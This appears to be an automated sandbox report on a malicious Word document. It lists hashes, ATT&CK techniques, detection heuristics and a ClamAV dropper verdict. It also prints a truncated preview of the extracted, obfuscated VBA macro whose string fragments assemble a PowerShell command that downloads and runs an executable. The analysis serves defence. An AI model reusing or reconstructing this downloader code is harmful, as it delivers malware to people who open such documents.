Office (OLE) malware analysis — malicious · 281ae4e896a0fe96

MALICIOUS

Office (OLE)

229.0 KB Created: 2017-12-28 17:30:00 Authoring application: Microsoft Office Word First seen: 2018-01-08

MD5: d674aaa1c87c7522f220b899d8cd7d3c SHA-1: 7d341274d9a16686d2e6d254f8c687f2941b8b0b SHA-256: 281ae4e896a0fe96ab28bab6a1da4d9a9d36f2b4d4ff88167df990e50735d0f5

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function and constructs a URL, likely to download and execute a second-stage payload. The presence of AutoOpen and Shell() calls, along with the ClamAV detection 'Img.Dropper.PhishingLure-6443153-0', strongly suggests a downloader or dropper functionality.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://wwhno+hnow.aphnoYPn+YPZqiAO5T In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 75829 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	75829 bytes
SHA-256: `7773c787dbf8461c2b926973205d52b358637c5570b7f251e6cb954f8d63c046`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "dsaDpatw" Function kDKinqqnXAD() On Error Resume Next NfzHwww = (HvKuBLJzNwzuT - Rnd(43 * Tan(mWaGZjwTrKR)) / VIMmZdmWWHBJM * Oct(kFcXaMKnrN) * qsapoDzcJp / Oct(mbWWIzI - Chr(250) + 581 - ChrB(URtDztqUkEh)) - 389 + QwNjkLjiDBjD) mjAEulA = (dQENPlSjDw - Rnd(43 * Tan(HWkjozol)) / wHcSRdPXms * Oct(HwTWzvvwR) * riJohiTFcDJLlZ / Oct(omvlVuwKiC - Chr(250) + 581 - ChrB(DNjtEqTa)) - 389 + dSdjzwRK) MNcqikXoC = (DlRCwwG) + Mid("t0onn+hnoico'+'laehno+hnolhno+hnorefuY'+'Pn+YPngio.hno+hnocl/iPFNo/,http:YPn+YPnhno+hno//hno+NrDiFFTaph", 5, 89) mPCWDcF = (jSBBEENfMsH - Rnd(43 * Tan(pbwzjPXcHkoOml)) / RabTkqXPbpTjAT * Oct(DGFnvjk) * UlIaYzinOSHw / Oct(lYWGRLU - Chr(250) + 581 - ChrB(PjXIFjhI)) - 389 + qNjpGibPwQzBEN) TFkVza = (SsDPtWsKi - Rnd(43 * Tan(jlvWiXlY)) / XGlfoWSNraMUKS * Oct(VFRVbNoRvOb) * ifizEjDNIjNPsa / Oct(BjRrWSPA - Chr(250) + 581 - ChrB(GQzjjopQNY)) - 389 + iJbHkGFYprCc) SQdBzw = (TTwfObuPP - Rnd(43 * Tan(qurTvWGKVfk)) / NzYSMpQM * Oct(jqwizBW) * mzIhnropKctWt / Oct(FiMFzGwPEwD - Chr(250) + 581 - ChrB(KDuozVkVjhb)) - 389 + aIjdBNXqIAl) EvpIrzC = (XzShjjdXPcEBl) + Mid("bIkZj0t05Xenvhno+hn'+'o:hno+hnophMHLwSPYvjL72lDu6qFBz49O6iW", 9, 25) tLrZHbzmH = (EnidXFj - Rnd(43 * Tan(fItomUdTq)) / CUqarIKGQMqLhD * Oct(zivGMsHrRCAhT) * lbEwuAIKdwZTRp / Oct(cUbpAppiNi - Chr(250) + 581 - ChrB(ucYYqaq)) - 389 + ilmMmDfn) wnnijTEUi = (brbijMmTYwi - Rnd(43 * Tan(RLGjzDM)) / RaGQUMJwKMTzGm * Oct(SAHMBEVzBIj) * LGnPfCmMAkLO / Oct(CoIMfjzfin - Chr(250) + 581 - ChrB(rrLpvdFHkiw)) - 389 + WznwUabiptpwQ) rFVYDXl = (ZrSJvtrTpFfl - Rnd(43 * Tan(FzcJKiq)) / omVBojjm * Oct(bEiqRjYwisu) * zzzBzthPRHpzak / Oct(wHHJLjL - Chr(250) + 581 - ChrB(bCOnPEKbqvN)) - 389 + oVArpzWNTOjPj) GBARJsUnj = (zjsaSYp) + Mid("biB5BhMz2Rh0F20Fkatl25(CYPn+6Cna", 23, 6) tbRKEtLR = (lWZjCcSH - Rnd(43 * Tan(nqzQXfDdsE)) / mPrmfEGFqwCNYj * Oct(jiAbWZOZzGWJE) * mPwuUaW / Oct(nEzVMRZldYh - Chr(250) + 581 - ChrB(wUcQiWXpsfJ)) - 389 + CDEiGTEIVEvwiA) IUbfmf = (jvnhcQbw - Rnd(43 * Tan(jRupsKMf)) / NkzpFcjdk * Oct(JPTARfbiIXbwr) * OCMPLLiUOV / Oct(fOuqKzzfmo - Chr(250) + 581 - ChrB(QRcJRjDIoPtcaD)) - 389 + URZKoBwfm) XCaJDLJXE = (fMwDjmHvBTJNr - Rnd(43 * Tan(KUYJrZfmhIZ)) / dDLTcznuaGFFp * Oct(nBcjEkIjS) * DQOrHtipdqI / Oct(jirLawE - Chr(250) + 581 - ChrB(OSTYmiJ)) - 389 + EphtkiQ) HwOYtGVXPwY = (zzOczbZFR) + Mid("MZXXZzln) -REPlacE ([ChaR]104+[ChaR]'+'110+[ChaR]111),[ChaR]39) )').rEplace('YPn',[StRINg][CHar]39) \| &( $SHeLlid[1]+$SHelliD[13]+'X')0q7YquWdLP2nNcACwbfzBzkt3WO", 8, 129) iHdcnbjT = (hozZbSEjT - Rnd(43 * Tan(vmBuwRFhFmmU)) / uchGcAtRlqsjr * Oct(iMzpvGQ) * hQiLXvQZAf / Oct(ACwuLbjaU - Chr(250) + 581 - ChrB(wJLGLWVI)) - 389 + qNWavQcQcwBMpN) tsZPCG = (EfziWNmOBRKFIP - Rnd(43 * Tan(TdEZDOJJpNlVn)) / aozoGGMWucY * Oct(zBCLLvSGw) * bpajvVIRkswnb / Oct(LRBIhzicAnO - Chr(250) + 581 - ChrB(GdBqDhij)) - 389 + KOXLqNdrj) pQsdsaor = (HTFLYvQDozib - Rnd(43 * Tan(diKDbTz)) / voPIkDWj * Oct(haQJJJLQaFv) * YXMaknCDMEcM / Oct(LipDnruUNRE - Chr(250) + 581 - ChrB(rUZwmBOC)) - 389 + WRDhzQUfOd) PCBXTnhfKo = (qCmRlNPjwK) + Mid("iMnIcmoM9jPno+hnoublic +'+'hno+hno 6hn'+'o+hnoa46nL6a4 + C5hno+hnoXkarapas hno+hno+ 6hno+hnoa4.exe6a4;fYPn+YPnoreachjI", 12, 105) iFZac = (MaZAutJZz - Rnd(43 * Tan(zomUnOfQ)) / oRIrPACizqkFkT * Oct(BjhcGzuHib) * WcCYbhNwr / Oct(DiJzrOMiPDPUOS - Chr(250) + 581 - ChrB(hDJwuJiQ)) - 389 + iabYPCr) jUbtf = (NjhUrczmUiv - Rnd(43 * Tan(iOFLRtAOIOocuO)) / jomLWTZwt * Oct(WMSiLTtzUi) * WjADRDWwrFad / Oct(RziSYaER - Chr(250) + 581 - ChrB(oujhjwvu)) - 389 + ZkjJEmIEQDw) OwiISAAPvjk = (BNjRtiECzpZSHU - Rnd(43 * Tan(nnTMLdsqV)) / KauNMkPs * Oct(dNrHVYn) * iiYfPIzvuFCM / Oct(IWOJjEJokE - Chr(250) + 581 - ChrB(ZErDvjzn)) - 389 + tOIwcuRzRR) EjwzVOjDJ = (bYzwXdOiiZOY) + Mid("hziPSW93zcRvlfcjbZ+hno5Xbcdhn'+'o+hno)hnYPn+YP'+'no+hno{try{C5XhYPn+YPnno+hnofraYP ... (truncated)

SHA-256: 7773c787dbf8461c2b926973205d52b358637c5570b7f251e6cb954f8d63c046

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "dsaDpatw"
Function kDKinqqnXAD()
On Error Resume Next
NfzHwww = (HvKuBLJzNwzuT - Rnd(43 * Tan(mWaGZjwTrKR)) / VIMmZdmWWHBJM * Oct(kFcXaMKnrN) * qsapoDzcJp / Oct(mbWWIzI - Chr(250) + 581 - ChrB(URtDztqUkEh)) - 389 + QwNjkLjiDBjD)
mjAEulA = (dQENPlSjDw - Rnd(43 * Tan(HWkjozol)) / wHcSRdPXms * Oct(HwTWzvvwR) * riJohiTFcDJLlZ / Oct(omvlVuwKiC - Chr(250) + 581 - ChrB(DNjtEqTa)) - 389 + dSdjzwRK)
MNcqikXoC = (DlRCwwG) + Mid("t0onn+hnoico'+'laehno+hnolhno+hnorefuY'+'Pn+YPngio.hno+hnocl/iPFNo/,http:YPn+YPnhno+hno//hno+NrDiFFTaph", 5, 89)
mPCWDcF = (jSBBEENfMsH - Rnd(43 * Tan(pbwzjPXcHkoOml)) / RabTkqXPbpTjAT * Oct(DGFnvjk) * UlIaYzinOSHw / Oct(lYWGRLU - Chr(250) + 581 - ChrB(PjXIFjhI)) - 389 + qNjpGibPwQzBEN)
TFkVza = (SsDPtWsKi - Rnd(43 * Tan(jlvWiXlY)) / XGlfoWSNraMUKS * Oct(VFRVbNoRvOb) * ifizEjDNIjNPsa / Oct(BjRrWSPA - Chr(250) + 581 - ChrB(GQzjjopQNY)) - 389 + iJbHkGFYprCc)
SQdBzw = (TTwfObuPP - Rnd(43 * Tan(qurTvWGKVfk)) / NzYSMpQM * Oct(jqwizBW) * mzIhnropKctWt / Oct(FiMFzGwPEwD - Chr(250) + 581 - ChrB(KDuozVkVjhb)) - 389 + aIjdBNXqIAl)
EvpIrzC = (XzShjjdXPcEBl) + Mid("bIkZj0t05Xenvhno+hn'+'o:hno+hnophMHLwSPYvjL72lDu6qFBz49O6iW", 9, 25)
tLrZHbzmH = (EnidXFj - Rnd(43 * Tan(fItomUdTq)) / CUqarIKGQMqLhD * Oct(zivGMsHrRCAhT) * lbEwuAIKdwZTRp / Oct(cUbpAppiNi - Chr(250) + 581 - ChrB(ucYYqaq)) - 389 + ilmMmDfn)
wnnijTEUi = (brbijMmTYwi - Rnd(43 * Tan(RLGjzDM)) / RaGQUMJwKMTzGm * Oct(SAHMBEVzBIj) * LGnPfCmMAkLO / Oct(CoIMfjzfin - Chr(250) + 581 - ChrB(rrLpvdFHkiw)) - 389 + WznwUabiptpwQ)
rFVYDXl = (ZrSJvtrTpFfl - Rnd(43 * Tan(FzcJKiq)) / omVBojjm * Oct(bEiqRjYwisu) * zzzBzthPRHpzak / Oct(wHHJLjL - Chr(250) + 581 - ChrB(bCOnPEKbqvN)) - 389 + oVArpzWNTOjPj)
GBARJsUnj = (zjsaSYp) + Mid("biB5BhMz2Rh0F20Fkatl25(CYPn+6Cna", 23, 6)
tbRKEtLR = (lWZjCcSH - Rnd(43 * Tan(nqzQXfDdsE)) / mPrmfEGFqwCNYj * Oct(jiAbWZOZzGWJE) * mPwuUaW / Oct(nEzVMRZldYh - Chr(250) + 581 - ChrB(wUcQiWXpsfJ)) - 389 + CDEiGTEIVEvwiA)
IUbfmf = (jvnhcQbw - Rnd(43 * Tan(jRupsKMf)) / NkzpFcjdk * Oct(JPTARfbiIXbwr) * OCMPLLiUOV / Oct(fOuqKzzfmo - Chr(250) + 581 - ChrB(QRcJRjDIoPtcaD)) - 389 + URZKoBwfm)
XCaJDLJXE = (fMwDjmHvBTJNr - Rnd(43 * Tan(KUYJrZfmhIZ)) / dDLTcznuaGFFp * Oct(nBcjEkIjS) * DQOrHtipdqI / Oct(jirLawE - Chr(250) + 581 - ChrB(OSTYmiJ)) - 389 + EphtkiQ)
HwOYtGVXPwY = (zzOczbZFR) + Mid("MZXXZzln)  -REPlacE  ([ChaR]104+[ChaR]'+'110+[ChaR]111),[ChaR]39) )').rEplace('YPn',[StRINg][CHar]39) | &( $SHeLlid[1]+$SHelliD[13]+'X')0q7YquWdLP2nNcACwbfzBzkt3WO", 8, 129)
iHdcnbjT = (hozZbSEjT - Rnd(43 * Tan(vmBuwRFhFmmU)) / uchGcAtRlqsjr * Oct(iMzpvGQ) * hQiLXvQZAf / Oct(ACwuLbjaU - Chr(250) + 581 - ChrB(wJLGLWVI)) - 389 + qNWavQcQcwBMpN)
tsZPCG = (EfziWNmOBRKFIP - Rnd(43 * Tan(TdEZDOJJpNlVn)) / aozoGGMWucY * Oct(zBCLLvSGw) * bpajvVIRkswnb / Oct(LRBIhzicAnO - Chr(250) + 581 - ChrB(GdBqDhij)) - 389 + KOXLqNdrj)
pQsdsaor = (HTFLYvQDozib - Rnd(43 * Tan(diKDbTz)) / voPIkDWj * Oct(haQJJJLQaFv) * YXMaknCDMEcM / Oct(LipDnruUNRE - Chr(250) + 581 - ChrB(rUZwmBOC)) - 389 + WRDhzQUfOd)
PCBXTnhfKo = (qCmRlNPjwK) + Mid("iMnIcmoM9jPno+hnoublic +'+'hno+hno 6hn'+'o+hnoa46nL6a4 + C5hno+hnoXkarapas hno+hno+ 6hno+hnoa4.exe6a4;fYPn+YPnoreachjI", 12, 105)
iFZac = (MaZAutJZz - Rnd(43 * Tan(zomUnOfQ)) / oRIrPACizqkFkT * Oct(BjhcGzuHib) * WcCYbhNwr / Oct(DiJzrOMiPDPUOS - Chr(250) + 581 - ChrB(hDJwuJiQ)) - 389 + iabYPCr)
jUbtf = (NjhUrczmUiv - Rnd(43 * Tan(iOFLRtAOIOocuO)) / jomLWTZwt * Oct(WMSiLTtzUi) * WjADRDWwrFad / Oct(RziSYaER - Chr(250) + 581 - ChrB(oujhjwvu)) - 389 + ZkjJEmIEQDw)
OwiISAAPvjk = (BNjRtiECzpZSHU - Rnd(43 * Tan(nnTMLdsqV)) / KauNMkPs * Oct(dNrHVYn) * iiYfPIzvuFCM / Oct(IWOJjEJokE - Chr(250) + 581 - ChrB(ZErDvjzn)) - 389 + tOIwcuRzRR)
EjwzVOjDJ = (bYzwXdOiiZOY) + Mid("hziPSW93zcRvlfcjbZ+hno5Xbcdhn'+'o+hno)hnYPn+YP'+'no+hno{try{C5XhYPn+YPnno+hnofraYP
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.